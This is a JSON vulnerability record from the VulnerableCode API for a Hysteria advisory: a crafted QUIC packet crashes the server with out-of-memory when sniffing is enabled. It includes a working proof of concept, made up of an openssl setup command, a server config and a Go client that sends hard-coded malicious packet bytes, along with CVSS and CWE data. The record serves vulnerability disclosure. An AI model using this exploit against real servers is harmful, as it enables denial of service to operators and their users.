{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95454?format=json","vulnerability_id":"VCID-6cnz-m8hk-myek","summary":"Hysteria: A specially constructed quic package can crash the server OOM when the sniff is enabled\n### Summary\n\nA specially constructed quic package can crash the server OOM when the sniff is enabled.\n\n### Details\n\nWhen the server has sniff enabled, a valid connection can request the server to forward UDP traffic and construct a huge crypto length. The server will allocate memory according to this length, causing an OOM.\n\n\n### PoC\n```\nopenssl req -x509 -newkey rsa:2048 -nodes -keyout localhost.key -out localhost.crt -days 365 -subj \"/CN=localhost\" 2>/dev/null\n```\n\nserver.yaml\n```\nlisten: :8443\ntls:\n  cert: localhost.crt\n  key: localhost.key\nauth:\n  type: password\n  password: mypassword\nsniff:\n  enable: true\noutbounds:\n  - name: my_direct\n    type: direct\n    default: true\n```\n\npoc.go\n\n```\npackage main\n\nimport (\n\t\"flag\"\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\t\"time\"\n\n\t\"github.com/apernet/hysteria/core/v2/client\"\n)\n\nfunc main() {\n\tserverAddrStr := flag.String(\"server\", \"127.0.0.1:8443\", \"Hysteria server address\")\n\tpassword := flag.String(\"password\", \"mypassword\", \"Hysteria server password\")\n\tflag.Parse()\n\n\tserverAddr, _ := net.ResolveUDPAddr(\"udp\", *serverAddrStr)\n\tc, _, err := client.NewClient(&client.Config{\n\t\tServerAddr: serverAddr, Auth: *password, TLSConfig: client.TLSConfig{InsecureSkipVerify: true},\n\t})\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to connect: %v\", err)\n\t}\n\tdefer c.Close()\n\n\tvar maliciousQUICPacket = []byte{\n\t\t0xcb, 0x0, 0x0, 0x0, 0x1, 0x8, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x0, 0x0,\n\t\t0x32, 0x1d, 0xa8, 0xd6, 0x3c, 0x51, 0x24, 0xb7, 0xbe, 0xf2, 0x91, 0x77, 0x1c, 0x9d, 0x66,\n\t\t0xfc, 0xab, 0x91, 0x1e, 0xaf, 0xf9, 0x14, 0xd5, 0xec, 0xb0, 0x74, 0x46, 0x4f, 0x4, 0x70,\n\t\t0x18, 0x35, 0x31, 0xc5, 0xea, 0x36, 0x40, 0x36, 0x65, 0xdf, 0xa4, 0xcc, 0xf9, 0xff, 0x65,\n\t\t0xe5, 0x1d, 0xb7, 0xc5, 0xc2, 0xc2,\n\t}\n\n\tudpConn, err := c.UDP()\n\tif err != nil {\n\t\tfmt.Printf(\"[-] UDP error: %v\\n\", err)\n\t}\n\ttargetAddr := fmt.Sprintf(\"8.8.8.8:443\")\n\tfmt.Printf(\"[*] Sending 'death' packet to %s...\\n\", targetAddr)\n\t_ = udpConn.Send(maliciousQUICPacket, targetAddr)\n\n\t// Wait longer to ensure packet delivery\n\ttime.Sleep(3 * time.Second)\n\tfmt.Printf(\"[+] Done.\\n\")\n}\n```\n\n\n### Impact\nWhen sniffing is enabled on the server, a user with a valid password can launch an attack that could cause the server to run out of memory (OOM).","aliases":[{"alias":"GHSA-9fw6-xgg2-mq9q"}],"fixed_packages":[],"affected_packages":[],"references":[{"reference_url":"https://github.com/apernet/hysteria","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apernet/hysteria"},{"reference_url":"https://github.com/apernet/hysteria/security/advisories/GHSA-9fw6-xgg2-mq9q","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apernet/hysteria/security/advisories/GHSA-9fw6-xgg2-mq9q"}],"weaknesses":[{"cwe_id":770,"name":"Allocation of Resources Without Limits or Throttling","description":"The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor."}],"exploits":[],"severity_range_score":"7.0 - 8.9","exploitability":null,"weighted_severity":null,"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6cnz-m8hk-myek"}